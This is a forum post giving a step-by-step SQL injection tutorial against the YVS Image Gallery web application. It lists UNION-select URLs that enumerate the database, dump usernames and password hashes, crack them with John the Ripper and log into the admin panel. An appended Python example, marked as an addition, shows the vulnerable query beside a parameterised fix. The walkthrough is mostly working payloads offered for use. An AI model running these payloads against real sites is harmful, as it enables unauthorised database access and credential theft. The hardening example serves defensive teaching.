
[video] Yvs Image Gallery –sql Injection Tutorial [/video] - Webmasters - Nairaland


[video] Yvs Image Gallery –sql Injection Tutorial [/video] by Slyr0x: 12:50pm On Mar 01, 2012
Brief Overview

YVS Image Gallery is a small database-driven gallery created to be implemented within your existing site. It is only a first attempt and the system has a long way to go, but it provides you with all the necessary tools to run your own picture gallery, such as uploading of multiple images and creation of thumbnails.

As reported by Corrado Liotta, YVS Image Gallery is vulnerable to SQL Injection. So basically what I did was to exploit this vulnerability.

Video: https://www.youtube.com/watch?v=pJgESf1lZF0


Tools

YVS Image Gallery.zip
A virtual machine (Example: VMware Player or Virtual Box)
Firefox – (Can be found in BackTrack 5)
John The Ripper – (Can be found in BackTrack 5)

Commands

//Open on firefox 
http://127.0.0.1/server_path/view_all_albums.php

//Check the column count

http://127.0.0.1/YVS1/view_album.php?album_id=1+order+by+1--

http://127.0.0.1/YVS1/view_album.php?album_id=1+union+select+1--

//Get the version, current user and the database name

http://127.0.0.1/server_path/view_album.php?album_id=-2+UNION+SELECT+concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)--

//Get all the tables in the database

http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(table_name)+FROM+information_schema.tables+where+table_schema=database()--

//Get all the column names

http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(column_name)+FROM+information_schema.columns+where+table_schema=database()--

//Get username & password from the table "user"

http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+concat(username,0x3a,password)+from+user--

//The password is md5 encrypted, so we have to decrypt it
//We save the username:hash in a file and name it "pwd.txt"
//We open up a terminal on our backtrack
//We need to Brute Force the user credentials for the web application using John The Ripper
cd pentest/passwords/john
./john pwd.txt --wordlist=password.txt --format=raw-MD5
//where password.txt is our password wordlist
//John the ripper then cracks the hash and gives us the password
//After which we then login to the YVS Image Gallery admin panel


Original Post: http://rotimiakinyele.com/posts/yvs-image-gallery-sql-injection.jsp


- @InfosecShinobi
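
The fix for the album_id flaw described in the post above, as an added example that is not part of the original post or of YVS Image Gallery's own code: the same lookup built by string concatenation and then with integer validation plus a bound parameter. The table layout, column names, function names and the use of SQLite in place of MySQL are assumptions made for illustration.

```python
import re
import sqlite3

def make_db():
    # Constructed stand-in for the gallery database (SQLite, not MySQL).
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE images (album_id INTEGER, filename TEXT);
        CREATE TABLE user (username TEXT, password TEXT);
        INSERT INTO images VALUES (1, 'beach.jpg'), (1, 'city.jpg');
        INSERT INTO user VALUES ('admin', 'HASH_PLACEHOLDER');
    """)
    return conn

def images_vulnerable(conn, album_id):
    # Request text is pasted into the statement, so it is parsed as SQL.
    sql = "SELECT filename FROM images WHERE album_id = " + album_id
    return [row[0] for row in conn.execute(sql)]

def images_hardened(conn, album_id):
    # 1) album_id must be a plain decimal integer, nothing else.
    if not re.fullmatch(r"[0-9]{1,9}", album_id):
        raise ValueError("album_id must be a decimal integer")
    # 2) The value is bound as data and never reaches the SQL parser.
    sql = "SELECT filename FROM images WHERE album_id = ? ORDER BY filename"
    return [row[0] for row in conn.execute(sql, (int(album_id),))]

# The post's last request, with concat() rewritten as || for SQLite.
PAYLOAD = "-1 union select username || ':' || password from user--"

def demo():
    conn = make_db()
    leaked = images_vulnerable(conn, PAYLOAD)
    try:
        images_hardened(conn, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return leaked, rejected, images_hardened(conn, "1")

if __name__ == "__main__":
    print(demo())
```

In PHP the equivalent is an integer cast or filter on album_id followed by a prepared statement (PDO or mysqli) instead of interpolating the request value into the query string.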
